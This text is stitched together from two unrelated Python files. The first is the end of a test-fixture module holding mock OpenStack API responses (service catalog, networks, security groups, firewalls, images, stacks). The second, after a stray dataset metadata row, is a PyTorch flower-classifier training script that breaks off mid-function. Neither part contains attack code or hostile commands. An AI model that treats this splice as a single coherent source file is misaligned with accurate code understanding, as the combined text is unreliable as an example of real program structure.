'adminURL': 'http://admin:9292/v1',
'internalURL': IMAGE_INTERNAL_ENDPOINT,
'publicURL': IMAGE_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Image Service',
'type': 'image'
}, {
'endpoints': [{
'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58',
'internalURL': COMPUTE_INTERNAL_ENDPOINT,
'publicURL': COMPUTE_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Compute Service',
'type': 'compute'
}, {
'endpoints': [{
'adminURL': 'http://admin:8773/services/Admin',
'internalURL': 'http://internal:8773/services/Cloud',
'publicURL': 'http://public:8773/services/Cloud',
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'EC2 Service',
'type': 'ec2'
}, {
'endpoints': [{
'adminURL': 'http://admin:35357/v2.0',
'internalURL': 'http://internal:5000/v2.0',
'publicURL': 'http://public:5000/v2.0',
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Identity Service',
'type': 'identity'
}, {
'endpoints': [{
'adminURL': 'http://admin:8080',
'internalURL': STORAGE_INTERNAL_ENDPOINT,
'publicURL': STORAGE_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Object Storage Service',
'type': 'object-store'
}, {
'endpoints': [{
'adminURL': 'http://neutron.usr.lab0.aub.cw-labs.net:9696',
'internalURL': NETWORK_INTERNAL_ENDPOINT,
'publicURL': NETWORK_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Network Service',
'type': 'network'
}, {
'endpoints': [{
'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777',
'internalURL': METERING_INTERNAL_ENDPOINT,
'publicURL': METERING_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Metering service',
'type': 'metering'
}, {
'endpoints': [{
'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777',
'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT,
'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT,
'region': 'RegionOne'}],
'endpoints_links': [],
'name': 'Orchestration service',
'type': 'orchestration'
}],
'token': {
'expires': '2012-10-03T16:53:36Z',
'id': TOKEN_ID,
'tenant': {
'description': '',
'enabled': True,
'id': PROJECT_ID,
'name': 'exampleproject'
}
},
'user': {
'id': USER_ID,
'name': 'exampleuser',
'roles': [{
'id': 'edc12489faa74ee0aca0b8a0b4d74a74',
'name': 'Member'}],
'roles_links': [],
'username': 'exampleuser'
}
}
}
ROLE_LIST = {u'roles': [
{u'id': u'201c290919ec4d6bb350401f8b4145a3',
u'name': u'heat_stack_owner'},
{u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'},
{u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'},
{u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'},
{u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'},
{u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'},
{u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'},
{u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}]
}
STORAGE_CONTAINERS_LIST = [
{
"count": 0,
"bytes": 0,
"name": STORAGE_CONTAINERS[0]
},
{
"count": 1,
"bytes": 14,
"name": STORAGE_CONTAINERS[1]
}
]
STORAGE_OBJECTS_LIST_0 = [
{
"hash": "451e372e48e0f6b1114fa0724aa79fa1",
"last_modified": "2014-01-15T16:41:49.390270",
"bytes": 14,
"name": STORAGE_OBJECTS[0]['name'],
"content_type":"application/octet-stream"
},
{
"hash": "ed076287532e86365e841e92bfc50d8c",
"last_modified": "2014-01-15T16:37:43.427570",
"bytes": 12,
"name": STORAGE_OBJECTS[1]['name'],
"content_type":"application/octet-stream"
}
]
STORAGE_OBJECTS_LIST_1 = [
{
"hash": "451e372e48e0f6b1114fa0724aa7AAAA",
"last_modified": "2014-01-15T16:41:49.390270",
"bytes": 14,
"name": STORAGE_OBJECTS[2]['name'],
"content_type":"application/octet-stream"
}
]
VOLUMES_LIST = {
"volumes": [
{
"attachments": [],
"availability_zone": "nova",
"bootable": "false",
"created_at": "2014-02-03T14:22:52.000000",
"display_description": None,
"display_name": "toto",
"id": VOLUMES_IDS[0],
"metadata": {},
"size": 1,
"snapshot_id": None,
"source_volid": None,
"status": "available",
"volume_type": "None"
},
{
"attachments": [],
"availability_zone": "nova",
"bootable": "true",
"created_at": "2014-02-03T14:18:34.000000",
"display_description": "",
"display_name": "CirrOS v0.3.0",
"id": VOLUMES_IDS[1],
"metadata": {},
"size": 1,
"snapshot_id": None,
"source_volid": None,
"status": "available",
"volume_type": "None"
}
]
}
SNAPSHOTS_LIST = {
"snapshots": [
{
"id": SNAPSHOTS_IDS[0],
"display_name": "snap-001",
"display_description": "Daily backup",
"volume_id": "521752a6-acf6-4b2d-bc7a-119f9148cd8c",
"status": "available",
"size": 10,
"created_at": "2012-02-29T03:50:07Z"
},
{
"id": SNAPSHOTS_IDS[1],
"display_name": "snap-002",
"display_description": "Weekly backup",
"volume_id": "76b8950a-8594-4e5b-8dce-0dfa9c696358",
"status": "available",
"size": 25,
"created_at": "2012-03-19T01:52:47Z"
}
]
}
VOLUME_BACKUPS_LIST = {
u'backups': [
{u'availability_zone': u'nova',
u'container': u'volumebackups',
u'created_at': u'2015-09-22T14:59:03.000000',
u'description': u'A Volume Backup',
u'fail_reason': None,
u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a',
u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT,
u'rel': u'self'}],
u'name': u'volumebackup-01',
u'object_count': 22,
u'size': 10,
u'status': u'available',
u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'}
]
}
ROUTERS_LIST = {
"routers": [{
"status": "ACTIVE",
"external_gateway_info":
{"network_id": "3c5bcddd-6af9-4e6b-9c3e-c153e521cab8"},
"name": "second_routers",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": ROUTERS_IDS[0]
}, {
"status": "ACTIVE",
"external_gateway_info":
{"network_id": "3c5bcddd-6af9-4e6b-9c3e-c153e521cab8"},
"name": "router1",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": ROUTERS_IDS[1]
}, {
"status": "ACTIVE",
"external_gateway_info":
{"network_id": "3c5bcddd-6af9-4e6b-9c3e-c153e521cab8"},
"name": "another_router",
"admin_state_up": True,
"tenant_id": "6b96ff0cb17a4b859e1e575d221683d3",
"id": "7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b"
}]
}
ROUTER_CLEAR_GATEWAY = {
"router": {
"status": "ACTIVE",
"external_gateway_info": None,
"name": "second_routers",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": ROUTERS_IDS[0]
}
}
ROUTER0_PORTS = {
"ports": [
{
"status": "ACTIVE",
"name": "",
"admin_state_up": True,
"network_id": "ebda9658-093b-41ba-80ce-0cf8cb8365d4",
"tenant_id": PROJECT_ID,
"binding:vif_type": "ovs",
"device_owner": "network:router_gateway",
"binding:capabilities": {
"port_filter": False
},
"mac_address": "fa:16:3e:b9:ef:05",
"fixed_ips": [
{
"subnet_id": "aca4d43c-c48c-4a2c-9bb6-ba374ef7e135",
"ip_address": "172.24.4.227"
}
],
"id": "664ebd1a-facd-4c20-948c-07a784475ab0",
"device_id": ROUTERS_IDS[0]
}
]
}
ROUTER1_PORTS = {
"ports": [
{
"status": "DOWN",
"name": "",
"admin_state_up": True,
"network_id": "ebda9658-093b-41ba-80ce-0cf8cb8365d4",
"tenant_id": PROJECT_ID,
"binding:vif_type": "ovs",
"device_owner": "network:router_gateway",
"binding:capabilities": {
"port_filter": False
},
"mac_address": "fa:16:3e:4a:3a:a2",
"fixed_ips": [
{
"subnet_id": "aca4d43c-c48c-4a2c-9bb6-ba374ef7e135",
"ip_address": "172.24.4.226"
}
],
"id": "c5ca7017-c390-4ccc-8cd7-333747e57fef",
"device_id": ROUTERS_IDS[1]
},
{
"status": "ACTIVE",
"name": "",
"admin_state_up": True,
"network_id": "9d83c053-b0a4-4682-ae80-c00df269ce0a",
"tenant_id": PROJECT_ID,
"binding:vif_type": "ovs",
"device_owner": "network:router_interface",
"binding:capabilities": {
"port_filter": False
},
"mac_address": "fa:16:3e:2d:dc:7e",
"fixed_ips": [
{
"subnet_id": "a318fcb4-9ff0-4485-b78c-9e6738c21b26",
"ip_address": "10.0.0.1"
}
],
"id": PORTS_IDS[0],
"device_id": ROUTERS_IDS[1]
}
]
}
NEUTRON_PORTS = {
'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [
{
"admin_state_up": True,
"allowed_address_pairs": [],
"binding:capabilities": {
"port_filter": False
},
"binding:host_id": "",
"binding:vif_type": "unbound",
"device_id": "",
"device_owner": "compute:azerty",
"extra_dhcp_opts": [],
"fixed_ips": [
{
"ip_address": "10.0.0.4",
"subnet_id": "51351eb9-7ce5-42cf-89cd-cea0b0fc510f"
}
],
"id": UNBOUND_PORT_ID,
"mac_address": "fa:16:3e:f5:62:22",
"name": "custom unbound port",
"network_id": "bf8d2e1f-221e-4908-a4ed-b6c0fd06e518",
"security_groups": [
"766110ac-0fde-4c31-aed7-72a97e78310b"
],
"status": "DOWN",
"tenant_id": PROJECT_ID
},
{
"admin_state_up": True,
"allowed_address_pairs": [],
"binding:capabilities": {
"port_filter": False
},
"binding:host_id": "",
"binding:vif_type": "unbound",
"device_id": "",
"device_owner": "",
"extra_dhcp_opts": [],
"fixed_ips": [
{
"ip_address": "10.0.0.4",
"subnet_id": "51351eb9-7ce5-42cf-89cd-cea0b0fc510f"
}
],
"id": "61c1b45e-45fe-4e04-8704-bf6f5876607d",
"mac_address": "fa:16:3e:f5:62:22",
"name": "custom unbound port",
"network_id": "bf8d2e1f-221e-4908-a4ed-b6c0fd06e518",
"security_groups": [
"766110ac-0fde-4c31-aed7-72a97e78310b"
],
"status": "DOWN",
"tenant_id": "ANOTHER_PROJECT"
}
]}
REMOVE_ROUTER_INTERFACE = {
"id": "8604a0de-7f6b-409a-a47c-a1cc7bc77b2e",
"tenant_id": "2f245a7b-796b-4f26-9cf9-9e82d248fda7",
"port_id": "3a44f4e5-1694-493a-a1fb-393881c673a4",
"subnet_id": "a2f1f29d-571b-4533-907f-5803ab96ead1"
}
NETWORKS_LIST = {
"networks": [
{
"status": "ACTIVE",
"subnets": ["a318fcb4-9ff0-4485-b78c-9e6738c21b26"],
"name": "private",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": NETWORKS_IDS[0],
"shared": False
},
{
"status": "ACTIVE",
"subnets": ["aca4d43c-c48c-4a2c-9bb6-ba374ef7e135"],
"name": "nova",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"id": NETWORKS_IDS[1],
"shared": False
},
{
"status": "ACTIVE",
"subnets": ["e12f0c45-46e3-446a-b207-9474b27687a6"],
"name": "network_3",
"admin_state_up": True,
"tenant_id": "ed680f49ff714162ab3612d7876ffce5",
"id": "afc75773-640e-403c-9fff-62ba98db1f19",
"shared": True
}
]
}
SECGROUPS_LIST = {
"security_groups": [
{
"description": "Custom Security Group",
"id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"name": "custom",
"security_group_rules": [
{
"direction": "egress",
"ethertype": "IPv6",
"id": "3c0e45ff-adaf-4124-b083-bf390e5482ff",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"tenant_id": PROJECT_ID
},
{
"direction": "egress",
"ethertype": "IPv4",
"id": "93aa42e5-80db-4581-9391-3a608bd0e448",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"tenant_id": PROJECT_ID
},
{
"direction": "ingress",
"ethertype": "IPv6",
"id": "c0b09f00-1d49-4e64-a0a7-8a186d928138",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"remote_ip_prefix": None,
"security_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"tenant_id": PROJECT_ID
},
{
"direction": "ingress",
"ethertype": "IPv4",
"id": "f7d45c89-008e-4bab-88ad-d6811724c51c",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"remote_ip_prefix": None,
"security_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"tenant_id": PROJECT_ID
}
],
"tenant_id": PROJECT_ID
},
{
"description": "default",
"id": "12345678-1234-1234-1234-123456789012",
"name": "default",
"security_group_rules": [
{
"direction": "egress",
"ethertype": "IPv6",
"id": "3c0e45ff-adaf-4124-b083-bf390e5482ff",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "12345678-1234-1234-1234-123456789012",
"tenant_id": PROJECT_ID
},
{
"direction": "egress",
"ethertype": "IPv4",
"id": "93aa42e5-80db-4581-9391-3a608bd0e448",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": None,
"remote_ip_prefix": None,
"security_group_id": "12345678-1234-1234-1234-123456789012",
"tenant_id": PROJECT_ID
},
{
"direction": "ingress",
"ethertype": "IPv6",
"id": "c0b09f00-1d49-4e64-a0a7-8a186d928138",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"remote_ip_prefix": None,
"security_group_id": "12345678-1234-1234-1234-123456789012",
"tenant_id": PROJECT_ID
},
{
"direction": "ingress",
"ethertype": "IPv4",
"id": "f7d45c89-008e-4bab-88ad-d6811724c51c",
"port_range_max": None,
"port_range_min": None,
"protocol": None,
"remote_group_id": "85cc3048-abc3-43cc-89b3-377341426ac5",
"remote_ip_prefix": None,
"security_group_id": "12345678-1234-1234-1234-123456789012",
"tenant_id": PROJECT_ID
}
],
"tenant_id": PROJECT_ID
}
]
}
FLOATING_IPS_LIST = {
"floatingips":
[
{
"router_id": "d23abc8d-2991-4a55-ba98-2aaea84cc72f",
"tenant_id": PROJECT_ID,
"floating_network_id": "376da547-b977-4cfe-9cba-275c80debf57",
"fixed_ip_address": "10.0.0.3",
"floating_ip_address": "172.24.4.228",
"port_id": "ce705c24-c1ef-408a-bda3-7bbd946164ab",
"id": FLOATING_IPS_IDS[0]
},
{
"router_id": None,
"tenant_id": PROJECT_ID,
"floating_network_id": "376da547-b977-4cfe-9cba-275c80debf57",
"fixed_ip_address": None,
"floating_ip_address": "172.24.4.227",
"port_id": None,
"id": FLOATING_IPS_IDS[1]
}
]
}
LBAAS_HEALTHMONITOR_LIST = {
"health_monitors":
[
{
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"delay": 5,
"expected_codes": "200",
"max_retries": 5,
"http_method": "GET",
"timeout": 2,
"pools": [],
"url_path": "/",
"type": "HTTP",
"id": LBAAS_HEALTHMONITOR_IDS[0]
}
]
}
LBAAS_VIP_LIST = {
"vips":
[
{
"status": "ACTIVE",
"protocol": "HTTP",
"description": "",
"address": "10.0.0.125",
"protocol_port": 80,
"port_id": PRIVATE_PORT_IDS[0],
"id": LBAAS_VIP_IDS[0],
"status_description": "",
"name": "test-http-vip",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"subnet_id": "b892434a-59f7-4404-a05d-9562977e1678",
"connection_limit": -1,
"pool_id": LBAAS_POOL_IDS[0],
"session_persistence": None
},
{
"status": "ACTIVE",
"protocol": "HTTP",
"description": "",
"address": "10.0.0.126",
"protocol_port": 80,
"port_id": PRIVATE_PORT_IDS[1],
"id": LBAAS_VIP_IDS[1],
"status_description": "",
"name": "test-http-vip",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"subnet_id": "b892434a-49f7-4404-a05d-9562977e1678",
"connection_limit": -1,
"pool_id": LBAAS_POOL_IDS[1],
"session_persistence": None
}
]
}
LBAAS_POOL_LIST = {
"pools":
[
{
"status": "ACTIVE",
"lb_method": "ROUND_ROBIN",
"protocol": "HTTP",
"description": "",
"health_monitors": [],
"subnet_id": "b892434a-59f7-4404-a05d-9562977e1678",
"tenant_id": PROJECT_ID,
"admin_state_up": True,
"name": "Test-Pools",
"health_monitors_status": [],
"members": [],
"provider": "haproxy",
"status_description": None,
"id": LBAAS_POOL_IDS[0]
},
{
"status": "ACTIVE",
"lb_method": "ROUND_ROBIN",
"protocol": "HTTP",
"description": "",
"health_monitors": [],
"subnet_id": "b892434a-49f7-4404-a05d-9562977e1678",
"tenant_id": PROJECT_ID,
"admin_state_up": True,
"name": "Test-Pools",
"health_monitors_status": [],
"members": [],
"provider": "haproxy",
"status_description": None,
"id": LBAAS_POOL_IDS[1]
}
]
}
LBAAS_MEMBER_LIST = {
"members":
[
{
"id": LBAAS_MEMBER_IDS[0],
"address": "10.0.0.122",
"protocol_port": 80,
"tenant_id": PROJECT_ID,
"admin_state_up": True,
"weight": 1,
"status": "ACTIVE",
"status_description": "member test1",
"pool_id": LBAAS_POOL_IDS[0]
},
{
"id": LBAAS_MEMBER_IDS[1],
"address": "10.0.0.123",
"protocol_port": 80,
"tenant_id": PROJECT_ID,
"admin_state_up": True,
"weight": 1,
"status": "ACTIVE",
"status_description": "member test1",
"pool_id": LBAAS_POOL_IDS[1]
}
]
}
FIREWALL_LIST = {
"firewalls":
[
{
"status": "ACTIVE",
"name": "fwass-test-1",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"firewall_policy_id": FIREWALL_POLICY_IDS[0],
"id": FIREWALL_IDS[0],
"description": ""
},
{
"status": "ACTIVE",
"name": "fwass-test-2",
"admin_state_up": True,
"tenant_id": PROJECT_ID,
"firewall_policy_id": FIREWALL_POLICY_IDS[1],
"id": FIREWALL_IDS[1],
"description": ""
}
]
}
METERING_LABEL_LIST = {
"metering_labels":
[
{
"tenant_id": PROJECT_ID,
"description": "Meter label test1",
"name": "Meterlabel1",
"id": METERING_LABEL_IDS[0]
},
{
"tenant_id": PROJECT_ID,
"description": "Meter label test2",
"name": "Meterlabel2",
"id": METERING_LABEL_IDS[1]
}
]
}
FIREWALL_POLICY_LIST = {
"firewall_policies":
[
{
"name": "TestFireWallPolicy1",
"firewall_rules": [FIREWALL_RULE_IDS[0]],
"tenant_id": PROJECT_ID,
"audited": False,
"shared": False,
"id": FIREWALL_POLICY_IDS[0],
"description": "Testing firewall policy 1"
},
{
"name": "TestFireWallPolicy2",
"firewall_rules": [FIREWALL_RULE_IDS[1]],
"tenant_id": PROJECT_ID,
"audited": False,
"shared": False,
"id": FIREWALL_POLICY_IDS[1],
"description": "Testing firewall policy 2"
}
]
}
FIREWALL_RULE_LIST = {
"firewall_rules":
[
{
"protocol": "tcp",
"description": "Firewall rule 1",
"source_port": None,
"source_ip_address": None,
"destination_ip_address": None,
"firewall_policy_id": None,
"position": None,
"destination_port": "80",
"id": FIREWALL_RULE_IDS[0],
"name": "",
"tenant_id": PROJECT_ID,
"enabled": True,
"action": "allow",
"ip_version": 4,
"shared": False
},
{
"protocol": "tcp",
"description": "Firewall rule 1",
"source_port": None,
"source_ip_address": None,
"destination_ip_address": None,
"firewall_policy_id": None,
"position": None,
"destination_port": "80",
"id": FIREWALL_RULE_IDS[1],
"name": "",
"tenant_id": PROJECT_ID,
"enabled": True,
"action": "allow",
"ip_version": 4,
"shared": False
}
]
}
SERVERS_LIST = {
"servers": [
{
"accessIPv4": "",
"accessIPv6": "",
"addresses": {
"private": [
{
"addr": "192.168.0.3",
"version": 4
}
]
},
"created": "2012-09-07T16:56:37Z",
"flavor": {
"id": "1",
"links": [
{
"href": "http://openstack.example.com/openstack/flavors/1",
"rel": "bookmark"
}
]
},
"hostId": "16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e",
"id": SERVERS_IDS[0],
"image": {
"id": "70a599e0-31e7-49b7-b260-868f441e862b",
"links": [
{
"href": "http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b",
"rel": "bookmark"
}
]
},
"links": [
{
"href": "http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931",
"rel": "self"
},
{
"href": "http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931",
"rel": "bookmark"
}
],
"metadata": {
"My Server Name": "Apache1"
},
"name": "new-server-test",
"progress": 0,
"status": "ACTIVE",
"tenant_id": "openstack",
"updated": "2012-09-07T16:56:37Z",
"user_id": "fake"
}
]
}
IMAGES_LIST = {
"images": [
{
"checksum": "f8a2eeee2dc65b3d9b6e63678955bd83",
"container_format": "ami",
"created_at": "2014-02-03T14:13:53",
"deleted": False,
"deleted_at": None,
"disk_format": "ami",
"id": "37717f53-3707-49b9-9dd0-fd063e6b9fc5",
"is_public": True,
"min_disk": 0,
"min_ram": 0,
"name": "cirros-0.3.1-x86_64-uec",
"owner": PROJECT_ID,
"properties": {
"kernel_id": "4e150966-cbe7-4fd7-a964-41e008d20f10",
"ramdisk_id": "482fbcc3-d831-411d-a073-ddc828a7a9ed"
},
"protected": False,
"size": 25165824,
"status": "active",
"updated_at": "2014-02-03T14:13:54"
},
{
"checksum": "c352f4e7121c6eae958bc1570324f17e",
"container_format": "aki",
"created_at": "2014-02-03T14:13:52",
"deleted": False,
"deleted_at": None,
"disk_format": "aki",
"id": "4e150966-cbe7-4fd7-a964-41e008d20f10",
"is_public": True,
"min_disk": 0,
"min_ram": 0,
"name": "cirros-0.3.1-x86_64-uec-kernel",
"owner": PROJECT_ID,
"properties": {},
"protected": False,
"size": 4955792,
"status": "active",
"updated_at": "2014-02-03T14:13:52"
},
{
"checksum": "69c33642f44ca552ba4bb8b66ad97e85",
"container_format": "ari",
"created_at": "2014-02-03T14:13:53",
"deleted": False,
"deleted_at": None,
"disk_format": "ari",
"id": "482fbcc3-d831-411d-a073-ddc828a7a9ed",
"is_public": True,
"min_disk": 0,
"min_ram": 0,
"name": "cirros-0.3.1-x86_64-uec-ramdisk",
"owner": PROJECT_ID,
"properties": {},
"protected": False,
"size": 3714968,
"status": "active",
"updated_at": "2014-02-03T14:13:53"
}
]
}
ALARMS_LIST = [
{
"alarm_actions": [
"http://site:8000/alarm"
],
"alarm_id": ALARMS_IDS[0],
"combination_rule": None,
"description": "An alarm",
"enabled": True,
"insufficient_data_actions": [
"http://site:8000/nodata"
],
"name": "SwiftObjectAlarm",
"ok_actions": [
"http://site:8000/ok"
],
"project_id": "c96c887c216949acbdfbd8b494863567",
"repeat_actions": False,
"state": "ok",
"state_timestamp": "2013-11-21T12:33:08.486228",
"threshold_rule": None,
"timestamp": "2013-11-21T12:33:08.486221",
"type": "threshold",
"user_id": "c96c887c216949acbdfbd8b494863567"
}
]
STACKS_LIST = {
"stacks": [
{
"description": "First test",
"links": [
{
"href": "http://site/5c136348-5550-4ec5-8bd6-b83241844db3",
"rel": "self"
}
],
"stack_status_reason": "",
"stack_name": "stack1",
"creation_time": "2015-03-03T14:08:54Z",
"updated_time": None,
"stack_status": "CREATE_SUCCESS",
"id": "5c136348-5550-4ec5-8bd6-b83241844db3"
},
{
"description": "Second test",
"links": [
{
"href": "http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9",
"rel": "self"
}
],
"stack_status_reason": "",
"stack_name": "stack2",
"creation_time": "2015-03-03T17:34:21Z",
"updated_time": None,
"stack_status": "DELETE_FAILED",
"id": "ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9"
}
]
}
| 1.210938 | 1 |
model.py | av192/Flower-Classifier | 0 | 12794298 | import yaml
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import os
import torch
import torchvision
import matplotlib.pyplot as plt
import seaborn as sns
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
from torchvision import datasets,models
import math
import torch.optim as optim
from torch.optim import lr_scheduler
import copy
import time
from PIL import Image
from datetime import datetime
from utils import *
data_dir = '.'
test_path = os.path.join(data_dir, 'test')
sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv'))
sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x))
# Get configs from config file
stream = open("config.yaml", 'r')
config_dict = yaml.safe_load(stream)
batch_size = config_dict['batch_size']
learning_rate = config_dict['lr']
model_pth = config_dict['model_pth']
train_data = config_dict['train_data']
valid_data = config_dict['valid_data']
test_data = config_dict['test_data']
# Apply transforms
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
data_transforms = {
'train': transforms.Compose([
transforms.Resize((230, 230)),
transforms.RandomRotation(30,),
transforms.RandomCrop(224),
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ToTensor(),
normalize
]),
'valid': transforms.Compose([
transforms.Resize((400, 400)),
transforms.CenterCrop((224, 224)),
transforms.ToTensor(),
normalize
]),
'test': transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
normalize
]),
}
# Load dataloaders
image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),
data_transforms[x])
for x in ['train', 'valid']}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0)
for x in ['train', 'valid']}
dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']}
class_names = image_datasets['train'].classes
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Trains Model
def train_model2(model, criterion, optimizer,
num_epochs=3, dataloaders= dataloaders, print_progress=False):
"""
:param model: Model type object
:param criterion: Loss function
:param optimizer: Optimizer
:param num_epochs: Number of epochs
:param dataloaders: Dataloaders, must be a dictionary having train and val as keys
:param print_progress: prints progress if true
:return: trained model object
"""
min_val_loss = np.Inf
best_model_wts = copy.deepcopy(model.state_dict())
since = time.time()
best_epoch = -1
for epoch in range(num_epochs):
valid_loss = 0.0
train_loss = 0.0
model.train()
running_corrects = 0
for iter1, (inputs, labels) in enumerate(dataloaders['train']):
inputs = inputs.to(device)
inputs = inputs.type(torch.float)
labels = labels.to(device)
labels = labels.type(torch.long)
optimizer.zero_grad()
out = model(inputs)
_, preds = torch.max(out, 1)
# out = torch.mul(out,100)
loss = criterion(out, labels)
loss.backward()
optimizer.step()
train_loss += loss.item() * inputs.size(0)
# running_corrects += torch.sum(preds == labels.data)
if print_progress:
print(
f"Epoch: {epoch}\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}" + '%',
end='\r')
else:
print()
with torch.no_grad():
model.eval()
for iter2, (inputs, labels) in enumerate(dataloaders['valid']):
inputs = inputs.to(device)
inputs = inputs.type(torch.float)
labels = labels.to(device)
labels = labels.type(torch.long)
output1 = model(inputs)
_, preds1 = torch.max(output1, 1)
# output1 = torch.mul(output1,100).to(device)
loss = criterion(output1, labels)
valid_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds1 == labels.data)
print(
f'Epoch: {epoch}\t{100 * (iter2 + 1) / len(dataloaders["valid"]):.2f} %',
end='\r')
        len_train1 = len(dataloaders['train'].dataset)  # derive from the loader instead of hard-coding the set size
len_val1 = len(dataloaders['valid'].dataset)
train_loss = train_loss / len_train1
valid_loss = valid_loss / len_val1
if print_progress:
print(
f'\nEpoch: {epoch + 1} \tTraining Loss: {math.sqrt(train_loss):.4f} \tValidation Loss: {math.sqrt(valid_loss):.4f}')
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print(f'Accuracy : {100 * running_corrects / len_val1} %')
if valid_loss < min_val_loss:
min_val_loss = valid_loss
best_epoch = epoch
best_model_wts = copy.deepcopy(model.state_dict())
print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss)))
print(f'Epoch completed: {epoch+1}')
print(f'Best Epoch: {best_epoch+1}')
model.load_state_dict(best_model_wts)
return model
def process_image(img_path):
"""
:param img_path: Path of image to be processed
:returns processed numpy array
Scales, crops, and normalizes a PIL image for a PyTorch model,
returns a Numpy array
"""
img = Image.open(img_path)
# Resize
if img.size[0] > img.size[1]:
img.thumbnail((10000, 256))
else:
img.thumbnail((256, 10000))
# Crop Image
left_margin = (img.width - 224) / 2
bottom_margin = (img.height - 224) / 2
right_margin = left_margin + 224
top_margin = bottom_margin + 224
img = img.crop((left_margin, bottom_margin, right_margin,
top_margin))
# Normalize
img = np.array(img) / 255
mean = np.array([0.485, 0.456, 0.406]) # provided mean
std = np.array([0.229, 0.224, 0.225]) # provided std
img = (img - mean) / std
return img
# Load test dataset from class defined in utils
test_dataset = TestDataset(test_path, sample_sub, data_transforms['test'])
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False)
# Load Class to idx dictionary
class_to_idx = image_datasets['valid'].class_to_idx
idx_to_class = {val: key for key, val in class_to_idx.items()}
def predict(model_path, dataloader, print_progress=False):
"""
:param model_path: Path of Model used for prediction
:param dataloader: Test DataLoader
:param print_progress: Prints progress if True
:return: Prediction(as a list) on test folder defined by config file
"""
model = torch.load(model_path)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model.to(device)
model.eval()
predictions = {}
with torch.no_grad():
for ii, (images, _, img_names) in enumerate(dataloader, start=1):
if print_progress:
if ii % 5 == 0:
print('Batch {}/{}'.format(ii, len(dataloader)))
images = images.to(device)
